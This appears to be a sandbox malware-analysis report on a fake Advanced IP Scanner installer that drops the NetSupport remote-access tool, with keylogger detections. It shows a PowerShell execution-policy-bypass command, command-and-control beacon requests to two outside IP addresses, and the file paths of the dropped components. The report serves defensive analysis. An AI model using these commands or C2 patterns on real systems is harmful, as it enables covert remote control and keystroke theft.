                                                                                                                      Oct 31, 2024 19:01:13.642297029 CET192.168.2.41.1.1.10xb588Standard query (0)geo.netsupportsoftware.comA (IP address)IN (0x0001)false
                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                      Oct 31, 2024 19:01:13.444267988 CET1.1.1.1192.168.2.40x6974No error (0)payiki.com151.236.16.15A (IP address)IN (0x0001)false
                                                                                                                      Oct 31, 2024 19:01:13.612397909 CET1.1.1.1192.168.2.40x3414No error (0)anyhowdo.com199.188.200.195A (IP address)IN (0x0001)false
                                                                                                                      Oct 31, 2024 19:01:13.659729004 CET1.1.1.1192.168.2.40xb588No error (0)geo.netsupportsoftware.com104.26.1.231A (IP address)IN (0x0001)false
                                                                                                                      Oct 31, 2024 19:01:13.659729004 CET1.1.1.1192.168.2.40xb588No error (0)geo.netsupportsoftware.com172.67.68.212A (IP address)IN (0x0001)false
                                                                                                                      Oct 31, 2024 19:01:13.659729004 CET1.1.1.1192.168.2.40xb588No error (0)geo.netsupportsoftware.com104.26.0.231A (IP address)IN (0x0001)false
                                                                                                                      • 151.236.16.15connection: keep-alivecmd=pollinfo=1ack=1
                                                                                                                      • geo.netsupportsoftware.com
                                                                                                                      • 199.188.200.195connection: keep-alivecmd=pollinfo=1ack=1
                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      0192.168.2.449739151.236.16.154435304C:\Users\user\AppData\Roaming\SysHelper\client32.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Oct 31, 2024 19:01:13.587723970 CET218OUTPOST http://151.236.16.15/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 22Host: 151.236.16.15Connection: Keep-AliveCMD=POLLINFO=1ACK=1
                                                                                                                      Data Raw:
                                                                                                                      Data Ascii:


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      1192.168.2.449741104.26.1.231805304C:\Users\user\AppData\Roaming\SysHelper\client32.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Oct 31, 2024 19:01:13.668118000 CET118OUTGET /location/loca.asp HTTP/1.1
                                                                                                                      Host: geo.netsupportsoftware.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Oct 31, 2024 19:01:14.636095047 CET957INHTTP/1.1 200 OK
                                                                                                                      Date: Thu, 31 Oct 2024 18:01:14 GMT
                                                                                                                      Content-Type: text/html; Charset=utf-8
                                                                                                                      Transfer-Encoding: chunked
                                                                                                                      Connection: keep-alive
                                                                                                                      CF-Ray: 8db58c97dbad469e-DFW
                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Cache-Control: private
                                                                                                                      Set-Cookie: ASPSESSIONIDCCBQAACB=BEFBGJHBHNACIEFMIPMPIOHI; path=/
                                                                                                                      cf-apo-via: origin,host
                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                      X-Powered-By: ASP.NET
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fHDqwhDCAxkK4Q1noDhKQFI2oq1kYJTNlOMcSMBkaFeB5ECDlfhnhj2kAlb6pZpGizfjHovT5z7nMjda0ntZBKz%2BOImo9zhX0ten5dXYNAlplZmx1QJEnYg0dDPwnXyvDVmLwYYXT2WX4mfL"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1470&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                      Data Raw: 66 0d 0a 33 32 2e 37 37 36 37 2c 2d 39 36 2e 37 39 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                      Data Ascii: f32.7767,-96.7970


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      2192.168.2.449740199.188.200.1954435304C:\Users\user\AppData\Roaming\SysHelper\client32.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Oct 31, 2024 19:01:13.687496901 CET222OUTPOST http://199.188.200.195/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 22Host: 199.188.200.195Connection: Keep-AliveCMD=POLLINFO=1ACK=1
                                                                                                                      Data Raw:
                                                                                                                      Data Ascii:


                                                                                                                      Click to jump to process

                                                                                                                      Click to jump to process

                                                                                                                      Click to dive into process behavior distribution

                                                                                                                      Click to jump to process

                                                                                                                      Target ID:0
                                                                                                                      Start time:14:00:44
                                                                                                                      Start date:31/10/2024
                                                                                                                      Path:C:\Users\user\Desktop\Advanced_IP_Scanner_2.5.4594.12.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Users\user\Desktop\Advanced_IP_Scanner_2.5.4594.12.exe"
                                                                                                                      Imagebase:0xa50000
                                                                                                                      File size:21'426'168 bytes
                                                                                                                      MD5 hash:446C29D515104B6752C1E9DA981D4E5E
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:Borland Delphi
                                                                                                                      Reputation:low
                                                                                                                      Has exited:true

                                                                                                                      Target ID:1
                                                                                                                      Start time:14:00:45
                                                                                                                      Start date:31/10/2024
                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp" /SL5="$402A0,18032967,815616,C:\Users\user\Desktop\Advanced_IP_Scanner_2.5.4594.12.exe"
                                                                                                                      Imagebase:0x500000
                                                                                                                      File size:3'305'472 bytes
                                                                                                                      MD5 hash:597637EDBEBB79D482E762E238209BCD
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:Borland Delphi
                                                                                                                      Reputation:low
                                                                                                                      Has exited:true

                                                                                                                      Target ID:5
                                                                                                                      Start time:14:01:07
                                                                                                                      Start date:31/10/2024
                                                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-UILLF.tmp\cispn.ps1"
                                                                                                                      Imagebase:0x510000
                                                                                                                      File size:433'152 bytes
                                                                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000005.00000002.2134480626.000000000500B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000005.00000002.2134480626.0000000004F0B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      Target ID:6
                                                                                                                      Start time:14:01:07
                                                                                                                      Start date:31/10/2024
                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                      File size:862'208 bytes
                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      Target ID:7
                                                                                                                      Start time:14:01:12
                                                                                                                      Start date:31/10/2024
                                                                                                                      Path:C:\Users\user\AppData\Roaming\SysHelper\client32.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Users\user\AppData\Roaming\SysHelper\client32.exe"
                                                                                                                      Imagebase:0x400000
                                                                                                                      File size:121'304 bytes
                                                                                                                      MD5 hash:4F2D0F4A5BA798FA9E85379C7C4BD36E
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000007.00000000.2061459893.0000000000404000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000007.00000002.3638481461.0000000000404000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000007.00000002.3639184086.0000000002572000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe, Author: Joe Security
                                                                                                                      Reputation:low
                                                                                                                      Has exited:false

                                                                                                                      Target ID:8
                                                                                                                      Start time:14:01:21
                                                                                                                      Start date:31/10/2024
                                                                                                                      Path:C:\Users\user\AppData\Roaming\SysHelper\client32.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Users\user\AppData\Roaming\SysHelper\client32.exe"
                                                                                                                      Imagebase:0x800000
                                                                                                                      File size:121'304 bytes
                                                                                                                      MD5 hash:4F2D0F4A5BA798FA9E85379C7C4BD36E
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000008.00000002.2161014488.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000008.00000000.2158956147.0000000000404000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000008.00000002.2160969972.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000008.00000002.2160969972.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000008.00000002.2160400872.0000000000404000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                                      Reputation:low
                                                                                                                      Has exited:true

                                                                                                                      Target ID:10
                                                                                                                      Start time:14:01:30
                                                                                                                      Start date:31/10/2024
                                                                                                                      Path:C:\Users\user\AppData\Roaming\SysHelper\client32.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Users\user\AppData\Roaming\SysHelper\client32.exe"
                                                                                                                      Imagebase:0x400000
                                                                                                                      File size:121'304 bytes
                                                                                                                      MD5 hash:4F2D0F4A5BA798FA9E85379C7C4BD36E
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000A.00000002.2249175114.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000A.00000002.2248759340.0000000000708000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000A.00000000.2240623467.0000000000404000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000A.00000002.2248546826.0000000000404000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000A.00000002.2249132975.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000A.00000002.2249132975.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                      Reputation:low
                                                                                                                      Has exited:true

                                                                                                                      Reset < >
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.2178491032.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_7670000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: Hbq$Hbq$Hbq$TJcq$Te^q
                                                                                                                        • API String ID: 0-2196417943
                                                                                                                        • Opcode ID: 641136b044416c70d722070dba8c95d11401da8267d811a0b09e997c0406eefa
                                                                                                                        • Instruction ID: 880a71736291fc67c58874e014a73ef5cd4da247aecbdd480380493a735cd558
                                                                                                                        • Opcode Fuzzy Hash: 641136b044416c70d722070dba8c95d11401da8267d811a0b09e997c0406eefa
                                                                                                                        • Instruction Fuzzy Hash: A6B19974A006418FCB18DF3AC594AAEBBF6BF85340F148569D4478B3A1DF35E94ACB81
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.2179256400.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_7800000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: ,etq$4'^q$4'^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                        • API String ID: 0-1206794132
                                                                                                                        • Opcode ID: 55c1bd20df044185497f316490246269764f1b1b17f6dd18256c05c64a7fe54c
                                                                                                                        • Instruction ID: 4471f6b66c72b2b08301b0b5fa19b1b18e576f299ef34e3ec44d5dd2dca308fb
                                                                                                                        • Opcode Fuzzy Hash: 55c1bd20df044185497f316490246269764f1b1b17f6dd18256c05c64a7fe54c
                                                                                                                        • Instruction Fuzzy Hash: 58B118B1B04209DFDB549F69DC54BAABBE2FF95210F1484AAD409CF291DB31C944C7D1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.2179256400.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_7800000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 4'^q$4'^q$4'^q$4'^q$U
                                                                                                                        • API String ID: 0-3478104857
                                                                                                                        • Opcode ID: 8e8c6cbe94e3a541d455b4331190f7e0e47b345b808fb248599989998f65f6ad
                                                                                                                        • Instruction ID: c8915b565d80e937f6f3eeeabc0371928aa479aad1309cad9c165c005444a2af
                                                                                                                        • Opcode Fuzzy Hash: 8e8c6cbe94e3a541d455b4331190f7e0e47b345b808fb248599989998f65f6ad
                                                                                                                        • Instruction Fuzzy Hash: 4E1247B1B042168FCB558F689C1076BBBA2AFE2314F1480BAD505CB2D2EF36D941C7E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.2179256400.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_7800000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: $^q$$^q$$^q
                                                                                                                        • API String ID: 0-831282457
                                                                                                                        • Opcode ID: d99f47c44594bf2329baff5afac72e1bed47aa69ae8482fba13daf84695bbd3c
                                                                                                                        • Instruction ID: 8cd7d70038737d4f9fb353f569d3eefc48fe889aaa1ecabdae18f9c8cb066614
                                                                                                                        • Opcode Fuzzy Hash: d99f47c44594bf2329baff5afac72e1bed47aa69ae8482fba13daf84695bbd3c
                                                                                                                        • Instruction Fuzzy Hash: D35218B1B042099FCB549F68DC00AAA7BA2AF95314F14C4AAD405CB3D1EF36DD65C7E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.2178491032.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_7670000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: (Xcq$LR^q$cXDk^
                                                                                                                        • API String ID: 0-1715424000
                                                                                                                        • Opcode ID: fc508a9d2668d379bed50eaf0f9fe988ed74d40dd869f6ec096428f76562e999
                                                                                                                        • Instruction ID: 5b6119dc972844d53009b8819aaa9641a4378e84247b8de70a745f4c34a0d441
                                                                                                                        • Opcode Fuzzy Hash: fc508a9d2668d379bed50eaf0f9fe988ed74d40dd869f6ec096428f76562e999
                                                                                                                        • Instruction Fuzzy Hash: D7524C74B10218CFDB24DB74D894BAEB7B6AF85300F118199D84A9B394DF34AD85CF92
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.2178491032.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_7670000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: (bq$(bq
                                                                                                                        • API String ID: 0-4224401849
                                                                                                                        • Opcode ID: 6aa32d6863e729dd282858d54d023904b0dc17938f7ce467698deffbf776776b
                                                                                                                        • Instruction ID: 3d9f00e6eccb01bf8f696810be575c573006ff424aa90c5f7fbb67a6aa86a3e2
                                                                                                                        • Opcode Fuzzy Hash: 6aa32d6863e729dd282858d54d023904b0dc17938f7ce467698deffbf776776b
                                                                                                                        • Instruction Fuzzy Hash: 23025DB4A00219DFDB15DFA8D584AAEBBB2BF88350F14C159E816AB355C731ED81CB90
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.2179256400.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_7800000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 4'^q$4'^q
                                                                                                                        • API String ID: 0-2697143702
                                                                                                                        • Opcode ID: 879390cef06b84a960fd09720136aaf8286940b98955ef8a5083c21cdec57223
                                                                                                                        • Instruction ID: 68f5acc7d75d85bb2b41f893085e86b78bd9db590e1cb6bad3ca9bcd2ca972d5
                                                                                                                        • Opcode Fuzzy Hash: 879390cef06b84a960fd09720136aaf8286940b98955ef8a5083c21cdec57223
                                                                                                                        • Instruction Fuzzy Hash: FA711CF0B402469FCB949F259C04A7A7BA5AFA2254F14807ACA09CB2D5EF36C941C7E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.2178491032.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_7670000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: (Xcq$LR^q
                                                                                                                        • API String ID: 0-2856513941
                                                                                                                        • Opcode ID: 5897798e124466af667b6b3e936ba0a392390d1a7f967526a917f764b3fea9f7
                                                                                                                        • Instruction ID: a068c498f46354287fc6327febd8de805369c2678c4a3da7c62ef7fe532f6fe7
                                                                                                                        • Opcode Fuzzy Hash: 5897798e124466af667b6b3e936ba0a392390d1a7f967526a917f764b3fea9f7
                                                                                                                        • Instruction Fuzzy Hash: 40517E74B00214CFDB14CF68C850BADBBB6FF89314F1141A9D54A9B364DB719D81CB91
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.2134089401.00000000030B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_30b0000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: W
                                                                                                                        • API String ID: 0-655174618
                                                                                                                        • Opcode ID: b66d97ea626fee759031056a435d64fb239b4c4da4685a3cc5418226d3d4b218
                                                                                                                        • Instruction ID: 8bc4a24d7add190f1273f3287e311348035e39b614603a6917f2a54cf39efeb6
                                                                                                                        • Opcode Fuzzy Hash: b66d97ea626fee759031056a435d64fb239b4c4da4685a3cc5418226d3d4b218
                                                                                                                        • Instruction Fuzzy Hash: 1CB16034A05205DFCB15CFA8D484AEEBBF2FF89710B1984A9E445AB362C735ED45CB60
                                                                                                                        Strings
                                                                                                                        • HIW9dSBb4eh/7UDOrQeyb60g/4ahfH0K7u/jF8lrExyMhdSFoMJ/9c0BRgyJcITcfPT6+eTp4giIGe7yPuncjfsvwLpjaNOCKkcPj4Jtct83gDG/zd9oHcmfe9JKQaGxMz, xrefs: 07676535
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.2178491032.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_7670000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: HIW9dSBb4eh/7UDOrQeyb60g/4ahfH0K7u/jF8lrExyMhdSFoMJ/9c0BRgyJcITcfPT6+eTp4giIGe7yPuncjfsvwLpjaNOCKkcPj4Jtct83gDG/zd9oHcmfe9JKQaGxMz
                                                                                                                        • API String ID: 0-1043417059
                                                                                                                        • Opcode ID: f5616a66f3890b606f4be9b1492831d8552be4cb7afd200009da000b044e2a69
                                                                                                                        • Instruction ID: f6f63267d95f74ab3e2d80513cabb2434d2405805776610721ea349fe1945208
                                                                                                                        • Opcode Fuzzy Hash: f5616a66f3890b606f4be9b1492831d8552be4cb7afd200009da000b044e2a69
                                                                                                                        • Instruction Fuzzy Hash: BB91B3B8B007518BCB24DF79D16846EB7F6AF897607608A19D8139B394DF38EC05CB91
                                                                                                                        Strings
                                                                                                                        • HIW9dSBb4eh/7UDOrQeyb60g/4ahfH0K7u/jF8lrExyMhdSFoMJ/9c0BRgyJcITcfPT6+eTp4giIGe7yPuncjfsvwLpjaNOCKkcPj4Jtct83gDG/zd9oHcmfe9JKQaGxMz, xrefs: 07676535
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.2178491032.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_7670000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: HIW9dSBb4eh/7UDOrQeyb60g/4ahfH0K7u/jF8lrExyMhdSFoMJ/9c0BRgyJcITcfPT6+eTp4giIGe7yPuncjfsvwLpjaNOCKkcPj4Jtct83gDG/zd9oHcmfe9JKQaGxMz
                                                                                                                        • API String ID: 0-1043417059
                                                                                                                        • Opcode ID: dac993cfb20bae874188fe117f9359f11b570137aefc67bed3a671d32cdd16d0
                                                                                                                        • Instruction ID: 89ab6ecace1c88b6f799b58d4dc51ce14272a281a19fc26ffbccdeed3164936f
                                                                                                                        • Opcode Fuzzy Hash: dac993cfb20bae874188fe117f9359f11b570137aefc67bed3a671d32cdd16d0
                                                                                                                        • Instruction Fuzzy Hash: 0B91A2B8B007558BCB24DF79D16846EB7F6AF897607608A18D8139B394DF38EC05CB91
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.2134089401.00000000030B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_30b0000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: F?p
                                                                                                                        • API String ID: 0-2207085408
                                                                                                                        • Opcode ID: 735df9b17dfd9f0d3e3471b07b778e33c21e59d0403001dbf3ae571b68e4bedd
                                                                                                                        • Instruction ID: bb93afe0354951b2542f0a0e339c9eef879c7db4c0c639b085f651e7c61d493c
                                                                                                                        • Opcode Fuzzy Hash: 735df9b17dfd9f0d3e3471b07b778e33c21e59d0403001dbf3ae571b68e4bedd
                                                                                                                        • Instruction Fuzzy Hash: 4D81F5719062D98FD716CB28DDA4BC9BFF1BF42244F0541D7C0449B3A2D6349E4ACBA1
                                                                                                                        Strings
                                                                                                                        • HIW9dSBb4eh/7UDOrQeyb60g/4ahfH0K7u/jF8lrExyMhdSFoMJ/9c0BRgyJcITcfPT6+eTp4giIGe7yPuncjfsvwLpjaNOCKkcPj4Jtct83gDG/zd9oHcmfe9JKQaGxMz, xrefs: 07676A9F, 07676AAD
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.2178491032.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_7670000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: HIW9dSBb4eh/7UDOrQeyb60g/4ahfH0K7u/jF8lrExyMhdSFoMJ/9c0BRgyJcITcfPT6+eTp4giIGe7yPuncjfsvwLpjaNOCKkcPj4Jtct83gDG/zd9oHcmfe9JKQaGxMz
                                                                                                                        • API String ID: 0-1043417059
                                                                                                                        • Opcode ID: 2272ccf48f9a66479729de5b1f872cd393b881dfaec4a812fb051fe3dbe9888f
                                                                                                                        • Instruction ID: 3f83fee6e3dbf7e933e1994be6d19076915dc8300ec5ac10dfebb1b8368d5c2a
                                                                                                                        • Opcode Fuzzy Hash: 2272ccf48f9a66479729de5b1f872cd393b881dfaec4a812fb051fe3dbe9888f
                                                                                                                        • Instruction Fuzzy Hash: 39417C757606518FC704CF39D89495ABBF9FF8961031581AAE90ACB772DB71EC00CB90
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.2179256400.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_7800000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: U
                                                                                                                        • API String ID: 0-3372436214
                                                                                                                        • Opcode ID: 78484d33658a241a48e7ff73584d67c6cd44decf9c8997783507db95ffcbeff5
                                                                                                                        • Instruction ID: d9c6610373123bb5b1ddcab715981af9056ac4e7e42af3a77a3ea13202894960
                                                                                                                        • Opcode Fuzzy Hash: 78484d33658a241a48e7ff73584d67c6cd44decf9c8997783507db95ffcbeff5
                                                                                                                        • Instruction Fuzzy Hash: 11410BF0B14206CFCB558F288C15A6A7FB2AFA2654F1580A6D404CF2D3DB39E941C7E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.2179256400.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_7800000_powershell.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 4'^q
                                                                                                                        • API String ID: 0-1614139903
